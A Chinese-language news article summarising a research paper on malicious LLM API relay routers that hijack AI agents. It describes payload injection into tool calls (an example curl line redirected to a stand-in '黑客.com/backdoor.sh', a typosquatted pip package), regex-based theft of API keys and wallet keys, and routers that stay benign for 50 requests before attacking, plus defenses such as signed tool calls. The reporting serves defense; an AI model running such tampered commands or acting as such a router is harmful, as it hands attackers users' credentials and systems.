Claude Code源码泄漏吹哨人再爆中转站漏洞, 你的Agent,可能早已“被我”掌控!

当你的AI助手帮你写代码、订机票、管理云服务器时，你可能从未想过，一个你毫不知情的“中间商”正盯着你的一举一动，甚至随时准备“接管”你的整个系统。

Claude Code源码泄漏事件在开发者圈引发震动，“吹哨人”Chaofan Shou 让世人看到了AI巨头内部的安全隐患。如今，Chaofan 再次出手，与加州大学圣塔芭芭拉分校等团队合作，发布了一篇题为 《Your Agent Is Mine》 的重磅论文，揭露了一个潜伏在AI供应链核心、比模型本身更致命的“阿喀琉斯之踵”——LLM API 中转站（Router）攻击。

简单来说，结论令人后背发凉：你的AI Agent，可能早已归我所有。

一、 AI世界的“隐形中转站”：谁在偷看你的对话？

现在的AI Agent早已不是简单的聊天机器人。它们能调用工具：执行代码、发送邮件、连接数据库……而这一切的指令，大多通过一个叫 “工具调用（Tool Call）” 的JSON格式数据包来传递。

问题出在传递路径上。为了省钱、省事或获得更好的模型组合，绝大多数开发者不直接调用OpenAI、Anthropic，而是使用 中转站，例如：

• 大平台：OpenRouter、LiteLLM
• 小作坊：淘宝、闲鱼上几块钱一个的“API聚合服务”

这些中转站，本质上就是一个“应用层中间人”。

论文一针见血地指出：你配置API地址的那一刻，就等于自愿把HTTPS加密的外衣脱掉，让中转站以明文形式阅读、修改、甚至伪造你与模型之间的每一条JSON消息。

二、 两大“致命杀招”：你的Agent是这样被夺走的

论文将恶意中转站的攻击手法系统化为两大核心攻击类别（AC），每一招都足以让企业或个人开发者瞬间破防。

杀招一：Payload Injection（负载注入，AC-1）—— “指鹿为马”

这是最恐怖的一招。当上游模型（比如GPT-4）已经“思考”完毕，返回一个安全的工具调用指令时，恶意中转站突然出手，在它抵达你的电脑之前，偷偷篡改了内容。

举例：

• 模型原意：curl -sSL https://安全的官网/install.sh （下载官方安装脚本）
• 中转站篡改后：curl -sSL https://黑客.com/backdoor.sh （下载后门脚本）

你的Agent完美执行了“黑客的命令”。更阴险的是依赖劫持：把 pip install requests 悄悄改成 pip install reqquests（拼写错误），你在不知不觉中装上了带有后门的恶意依赖包，从此你的所有项目都被永久污染。

杀招二：Secret Exfiltration（密钥窃取，AC-2）—— “雁过拔毛”

如果你的Agent代码里不小心打印了API Key，或者配置里写了AWS密钥、以太坊私钥？中转站就像一道安检X光机，被动扫描每一个数据包，一旦匹配到sk-、AKIA、0x开头等正则表达式，立刻静默发送给攻击者。

你甚至感觉不到任何延迟，但你的“家底”已经被人掏空。

更狡猾的“自适应规避”（Adaptive Evasion）

你以为简单测试一下没事就安全了？太天真了。

论文发现，现实中已存在会“装死”的智能Router：

• 条件触发：前50次请求完全正常，等你放松警惕，第51次开始注入恶意代码。
• 目标筛选：只在检测到“YOLO模式”（完全自动化、无需人工确认的高危场景）或者针对特定编程语言（如Rust、Go项目）时才下手。

传统的短时间安全审计，在这种攻击面前形同虚设。

三、 触目惊心的实证：这不是科幻，是现实

研究者没有停留在理论，而是进行了大规模的实地测量，结果触目惊心：

1. 公开市场调查：购买了 28个付费 和收集了 400个免费 中转站。

• 9个 正在主动注入恶意代码！
• 2个 部署了上述“自适应规避”逻辑！
• 17个 偷偷摸过研究者放置的AWS“蜜罐”凭证！
• 有1个 甚至直接转走了研究者预存的一个以太坊钱包里的资金！

2. “钓鱼执法”实验：研究者故意在中文论坛、微信群、TG群泄露一个自己的OpenAI密钥。

• 结果，这个密钥被多个“看似正常”的中转站复用。
• 研究者通过后台看到，这个密钥被用于处理了 2.1亿个Token，暴露了 99个真实凭证，涉及 440个Codex会话。
• 可怕的是，其中401个会话处于完全的“YOLO”模式（即自动批准工具执行），意味着根本不需要什么高级条件触发，攻击者直接就能控制这些Agent！

这证明了，就算你用的Router本身是好的，只要它复用了被泄露的上游密钥，或者把流量转给了别的弱Router，你也等于暴露在攻击面之下。 信任链瞬间崩塌。

四、 我们该怎么办？防守与展望

面对这种“中间人”暴政，普通人还能做什么？论文作者也给出了几个可以立即上手的“缓兵之计”：

1. 高危工具策略门：在客户端设置一道关卡，只要检测到curl、pip等高风险命令，且目标域名不在白名单内，直接拦截。这能挡住90%以上的简单AC-1攻击，但防不住“依赖劫持”（因为域名还是pypi.org）。
2. 响应端异常筛查：用一个AI模型去分析返回的Tool Call是否符合常规。如果突然出现高熵值（乱码）、奇怪的字符串，就报警。不过这属于“亡羊补牢”，防不住高级攻击。
3. 透明日志：把所有进出Router的请求响应都记录下来。虽然不能阻止攻击，但至少能在出事之后，知道谁偷看了你、修改了什么。

然而，治本之策在于“源头”：

呼吁模型提供商（OpenAI、Anthropic等）为返回的Tool Call进行签名！

就像网站的SSL证书一样，客户端在收到指令后，应该能验证这条指令确实来自官方模型，而不是被Router篡改过的。论文提出了一个“规范响应信封”的方案，只有加密签名验证通过，Agent才执行动作。这才是未来的安全方向。

写在最后

AI供应链安全，我们过去关注模型后门、提示词注入，却忽视了这条最脆弱、最不引人注意的“通道”。正如论文标题所言：Your Agent Is Mine。

当你下次在淘宝购买“超低价API”或在GitHub上随意配置一个Router地址时，请记住：你不仅是在租用算力，更是在把自己的数字生命、代码资产、甚至服务器控制权，交给一个未知的中间人。

警惕AI时代的“中间人”风险，从谨慎选择每一个API中转站开始。

附：研究涉及工具

• 恶意Router模板：new-api, one-api, sub2api（已被广泛下载数百万次）
• 受影响Agent框架：OpenClaw, OpenCode, OpenAI Codex, Anthropic Claude Code
• 论文地址：https://arxiv.org/abs/2604.08407

安全无小事，转发让更多人看见。